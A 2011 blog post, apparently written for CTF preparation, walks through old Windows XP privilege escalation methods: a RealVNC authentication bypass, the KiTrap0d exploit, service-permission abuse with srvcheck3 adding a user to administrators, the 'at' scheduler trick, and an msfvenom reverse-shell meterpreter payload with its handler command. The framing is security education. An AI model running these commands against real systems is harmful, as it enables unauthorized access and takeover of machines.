Wednesday, November 16, 2011

Old Privilege Escalation Techniques

One of my pet-peeves when it comes to "ethical hacker" training is that it is normally outdated and irrelevant. Teaching students how to use hacking "tools" from 2001 creates misinformed professionals and increases the number of low-skilled, highly-certified people in our industry. Truthfully, it’s been years since I last saw an unpatched Windows XP machine without AV on an engagement. I am aware of exceptions such as stand-alone workstations and SCADA systems, but generally machines shouldn't receive a pentest if they aren’t at least patched.

With that said, this post contains nothing new, fresh or possibly even relevant. I was prompted to write it after a few discussions with people who are preparing for upcoming CTFs. This is just a collection of old privilege escalation methods for unpatched Windows XP through SP2 workstations which may or may not be helpful. Some methods work better than others and many rely on vulnerabilities that have long been patched. If you are looking for new and exciting exploitation techniques, go here.

An older vulnerability that I do continue to see quite regularly is in the RealVNC product. RealVNC is a remote administration tool and typically listens on 5900. To scan for VNC and check for the RealVNC authentication bypass vulnerability with Nmap:

nmap -Pn -p5900 x.x.x.x --script=realvnc-auth-bypass

It may be important to note that RealVNC also hosts a java-based webserver on port 5800. This target machine is most likely vulnerable according to Nmap. There are several "patched" versions of the VNC client which allow you take advantage of the vulnerability. You can download one here or read more about the vulnerability here.

Disclaimer: Links provided on this site are for research purposes only. Always exercise caution when downloading code from the internet, especially hack tools.

Once you've downloaded and vetted the exploit, you can run it in Linux with wine.

Enter the IP address of the target and you will likely be presented with a view of the currently logged-in user's desktop. The only thing the active user will see is the RealVNC icon in the bottom right corner turn black. They will also be able to quickly get the IP address that is connected. If you encounter this vulnerability on a real engagement, you should probably have a plan to quickly convert this access to a more stealthy method.

Another note is that several commercial security products such as Symantec Endpoint Protection detect and block this attack.

Now that we have GUI access to the machine, let’s find out more about the account and privileges we currently have. Windows XP lacks the "whoami" binary, but with GUI accesss we can see the user by clicking the "start" button. The following "net" command lets us know that we are just a limited user:

net user joe.user

We can see what service packs are installed by checking the system properties.

There are several methods for introducing code to the machine, but the easiest method in this scenario is with IE or any other browser. Let’s grab a few exploits from:

Vet the code. Then throw them in a zip to be introduced onto the target machine.

Once we have uploaded our zip file with the binaries we can get started with the demo. The first method can be used from nearly any privilege level in order to reach "NT Authority\System" privileges. Simply upload the compiled KiTrap0d exploit along with the vdmexploit.dll and execute it. It works great for this scenario, but if you are attempting to use it through other attack vectors - you will likely have to make some minor adjustments to the code and recompile it.

This vulnerability was patched by MS10-015 , but the exploit continues to be extremely reliable when a machine has not been patched properly.

Another older method of escalation involves insecure permissions on services in Windows XP SP1 and Server 2003 (pre-SP1). Srvcheck3 is a tool which can scan for and exploit these permissions. For example, below is the output of "srvcheck3.exe -l" on a Windows XP SP1 machine.

You can then use srvcheck3 to exploit the service with the following syntax: 

srvcheck3.exe -m upnphost -H -c "cmd.exe /c net localgroup administrators joe.user /add" 

This method will not work against our XP SP2 demo target, but we successfully added our limited user to the administrators group on the XP SP1 machine.

Another generic privilege escalation method is to find a remote exploit such as MS08-067 or MS03-026, compile it and target it at This method can be extremely effective in lab settings and CTFs. Just be mindful of your target and ensure that the exploit is properly suited for it. For example, some public exploits aren't written to work against NX targets.

You can clearly see the targets that are available for the DCOM exploit in the screenshot below:

The methods discussed above can be used to escalate from user-level privileges to System, but what if you have administrator privileges and you want to get to System? There are a few easy methods on pre-Vista machines, but one example method is to use the "At" scheduler.

The "at" command is deprecated but works just fine against XP/2K3 targets. First we ensure that the scheduler service is running. If not, we would issue the "net start schedule" command. Next, we find out the system time and finally we schedule our task to run interactively a few minutes in the future. This particular syntax works against XP, but your mileage may vary against different service pack levels of Server 2K3.

In this example we had it pop up a system-level cmd.exe interactively, but you will likely find more use out of having it execute some other command or executable.

Of course if I was presented with this general scenario on a real engagement, I would use the Metasploit framework.  Since our unpatched XP target doesn't have PowerShell installed, we will have to generate an executable with Metasploit.  Most AV products will flag a meterpreter payload as malicious, but in this case there isn't an AV product installed. 

msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikate_ga_nai -b '\x00' -i 4 -f exe LHOST=x.x.x.x LPORT=443 >> /root/Desktop/demo.exe

Next we can download our exe through IE and execute it.  From the user-level process, we can run the "getsystem" post exploitation module.

msfcli exploit/multi/handler PAYLOAD=windows/meterpreter/reverse_tcp LHOST=x.x.x.x LPORT=443 E

As you can see, "technique 4" was used.  Technique 4 is the Kitrap0d attack discussed earlier implemented in the 'priv' extension of meterpreter.  If we had administrative privileges, it would have been successful with a different technique.

Finally, thank you to all of the researchers who discovered these vulnerabilities and went through the pain of disclosing them properly.